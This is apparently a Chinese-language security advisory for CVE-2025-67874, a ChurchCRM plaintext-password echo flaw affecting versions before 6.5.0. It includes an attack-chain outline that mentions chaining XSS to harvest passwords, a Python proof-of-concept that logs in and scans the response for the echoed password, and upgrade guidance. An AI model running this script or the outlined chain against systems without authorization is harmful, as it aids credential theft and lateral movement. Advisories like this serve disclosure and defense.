CVE-2025-67874 ChurchCRM密码明文回显信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-67874

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源教会管理系统。在6.5.0版本之前，该应用存在严重的信息泄露漏洞，会在后续的HTTP响应中明文回显用户提交的密码。这一漏洞使得攻击者可以通过拦截HTTP响应直接获取用户的明文密码，显著增加了凭证泄露的风险。此外，该漏洞还会放大其他安全漏洞的影响，当与XSS、IDOR、会话固定等漏洞结合使用时，攻击者可以系统性地窃取其他用户的密码，可能导致整个系统用户账户被攻陷。攻击者利用此漏洞无需特殊权限，仅需普通用户账号即可实施攻击，且无需用户交互。

技术细节

该漏洞属于敏感数据处理不当导致的信息泄露问题。在用户认证流程中，应用程序在处理登录请求时，会将用户提交的密码以明文形式包含在后续的HTTP响应中返回给客户端。正常情况下，用户密码在传输和存储时都应进行加密处理，不应在响应中回显。攻击者可以通过以下方式利用此漏洞：1) 使用低权限账号登录系统；2) 拦截登录后的HTTP响应；3) 从响应正文中提取明文密码；4) 使用获取的密码尝试横向移动或提升权限。由于密码以明文形式传输，如果存在XSS漏洞，攻击者还可以通过JavaScript脚本自动收集其他用户的密码。修复方案是在6.5.0版本中移除了密码回显功能，并确保所有敏感数据在传输过程中使用HTTPS加密。

攻击链分析

STEP 1

步骤1

攻击者获取ChurchCRM系统普通用户账号（低权限）

STEP 2

步骤2

使用获取的账号登录系统，触发登录请求

STEP 3

步骤3

拦截登录后的HTTP响应，从响应正文中提取明文密码

STEP 4

步骤4

如果存在XSS漏洞，注入恶意JavaScript代码自动收集其他用户密码

STEP 5

步骤5

利用获取的凭证进行横向移动，提升权限或访问敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67874 PoC - ChurchCRM Password Echo Information Disclosure # This PoC demonstrates the password echo vulnerability in ChurchCRM < 6.5.0 import requests import re from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) TARGET_URL = "https://target-churchcrm.com" USERNAME = "[email protected]" PASSWORD = "user_password" def exploit_password_echo(): """ Exploit the password echo vulnerability in ChurchCRM The application echoes back plaintext passwords in HTTP responses """ session = requests.Session() # Step 1: Attempt login to trigger password echo login_url = f"{TARGET_URL}/session/login" login_data = { "Username": USERNAME, "Password": PASSWORD } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print(f"[*] Attempting login with user: {USERNAME}") response = session.post(login_url, data=login_data, headers=headers, verify=False, allow_redirects=False) # Step 2: Search for plaintext password in response # The vulnerability echoes password in hidden fields or response body password_patterns = [ r'value=["\']{}["\']'.format(re.escape(PASSWORD)), r'password["\s]*[:=]["\s]*["\']{}["\']'.format(re.escape(PASSWORD)), r'<input[^>]*value=["\']{}["\'][^>]*type=["\']password["\']'.format(re.escape(PASSWORD)), r'"password"\s*:\s*"{}"'.format(re.escape(PASSWORD)) ] for pattern in password_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: print(f"[!] VULNERABLE: Plaintext password found in response!") print(f"[+] Password echoed: {PASSWORD}") print(f"[+] Response status: {response.status_code}") return True print("[*] No plaintext password echo detected (possibly patched)") return False def check_version(): """Check ChurchCRM version""" version_url = f"{TARGET_URL}/api/system/ping" try: response = requests.get(version_url, verify=False, timeout=10) if response.status_code == 200: data = response.json() version = data.get('version', 'unknown') print(f"[*] ChurchCRM Version: {version}") return version except Exception as e: print(f"[*] Could not determine version: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-67874 - ChurchCRM Password Echo PoC") print("=" * 60) version = check_version() exploit_password_echo() print("\n[*] Mitigation: Upgrade to ChurchCRM 6.5.0 or later")

影响范围

ChurchCRM < 6.5.0

防御指南

临时缓解措施

立即升级到ChurchCRM 6.5.0或更高版本。在升级前，可以暂时禁用不信任用户的登录功能，并加强对HTTP流量的监控，及时发现异常的密码回显行为。同时确保Web服务器配置正确，禁止缓存包含敏感信息的响应。